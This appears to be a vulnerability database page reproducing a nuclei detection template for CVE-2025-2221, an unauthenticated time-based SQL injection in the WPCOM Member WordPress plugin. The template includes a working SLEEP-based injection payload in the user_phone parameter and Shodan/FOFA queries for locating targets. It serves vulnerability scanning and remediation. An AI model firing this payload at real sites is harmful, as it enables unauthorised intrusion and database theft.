Lucene search
K

WordPress WPCOM Member <= 1.7.6 - SQL Injection

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

WordPress WPCOM Member plugin up to 1.7.6 has unauthenticated SQL Injection via user_phone.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-2221
14 Mar 202509:00
circl
CNNVD
WordPress plugin WPCOM Member SQL注入漏洞
14 Mar 202500:00
cnnvd
CVE
CVE-2025-2221
14 Mar 202506:43
cve
Cvelist
CVE-2025-2221 WPCOM Member <= 1.7.6 - Unauthenticated Time-Based SQL Injection
14 Mar 202506:43
cvelist
EUVD
EUVD-2025-6411
3 Oct 202520:07
euvd
NVD
CVE-2025-2221
14 Mar 202507:15
nvd
OSV
CVE-2025-2221
14 Mar 202507:15
osv
Patchstack
WordPress WPCOM Member plugin <= 1.7.6 - Unauthenticated Time-Based SQL Injection vulnerability
13 Mar 202517:30
patchstack
Positive Technologies
PT-2025-11248
14 Mar 202500:00
ptsecurity
RedhatCVE
CVE-2025-2221
16 Mar 202507:18
redhatcve
Rows per page
id: CVE-2025-2221

info:
  name: WordPress WPCOM Member <= 1.7.6 - SQL Injection
  author: neosmith1,0x_Akoko
  severity: high
  description: |
   WPCOM Member plugin for WordPress up to 1.7.6 contains a time-based SQL Injection caused by insufficient escaping and lack of preparation on the 'user_phone' parameter, letting unauthenticated attackers extract sensitive information, exploit requires sending crafted 'user_phone' parameter.
  impact: |
   Attackers can extract sensitive database information, potentially leading to data breach and privacy violations.
  remediation: |
   Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcom-member/wpcom-member-176-unauthenticated-sql-injection
    - https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.6/includes/class-sesstion.php#L35
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2221
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2221
    epss-score: 0.01708
    epss-percentile: 0.74561
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    vendor: Bastien Ho
    product: wpcom-member
    shodan-query: http.component:"WordPress"
    fofa-query: body="wpcom-member"
  tags: cve,cve2025,wordpress,wp-plugin,sqli,wpcom-member,unauthenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpcom_login_modal&type=login

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'member_form_login_nonce" value="([a-z0-9]+)"'
        part: body
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "member_form_login_nonce")
          - nonce != ""
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 25s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpcom_login&user_phone=1%27+AND+%28SELECT+1+FROM+%28SELECT+SLEEP%286%29%29a%29--+-&sms_code=123456&member_form_login_nonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - duration >= 6
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100cb600ea8940cf796d3302ec11957392018fe5929de9d89597700c1e92fcedc7502200b58ae4a0b48bd426ccb0386d612f78ec43221459304c1e0b30e823832b7b65e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Apr 2026 14:39Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.01708
SSVC
5